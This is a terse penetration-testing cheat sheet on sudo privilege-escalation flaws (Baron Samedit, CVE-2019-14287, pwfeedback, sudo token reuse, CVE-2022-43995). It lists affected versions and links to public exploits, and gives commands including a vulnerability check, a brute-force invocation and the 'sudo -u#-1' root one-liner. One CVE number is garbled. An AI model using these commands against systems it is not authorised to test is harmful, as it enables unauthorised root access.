# CVE-2021-3156 Baron Samedit

* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
* Heap based overflow
* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
* Check vulnerability via
```sh
sudoedit -s '\' $(python -c "print('\x41' * 10000)")
```
* Defaults to try
```sh
./brute.sh 90 120 50 70 150 300
```

## CVE-2019-14287

* Versions < 1.8.28

### Usage 

* Integer overflow with resulting root status.
```sh
sudo -u#-1 <app>
```
## CVE-18634 

* Sudo pwnge with pwfeedback()
* Sudo version 1.7.1 to 1.8.30
* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634)


## Reusing Sudo Token

* Reuse sudo token of currently logged in user
* [Hacktricks' site](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens)

* `ptrace` has to be fully enabled
```sh
cat /proc/sys/kernel/yama/ptrace_scope
0
```
* sudo has to be triggered the last 15 minutes, check `ps wuax`
* `gdb` has to be installed
* One must be logged in as the same user which should be owned
* Use [nongiach's exploit](https://github.com/nongiach/sudo_inject)

## Heap Based Overflow

* [CVE-2022-43995](https://bugzilla.redhat.com/show_bug.cgi?id=2139911)

Marco Benatto: 
> Sudo 1.8.0 through 1.9.12, with the crypt() password backend, contains  
a plugins/sudoers/auth/passwd.c array-out-of-bounds error that can result  
in a heap-based buffer over-read. This can be triggered by arbitrary local  
users with access to Sudo by entering a password of seven characters or 
 fewer. The impact could vary depending on the compiler and processor architecture.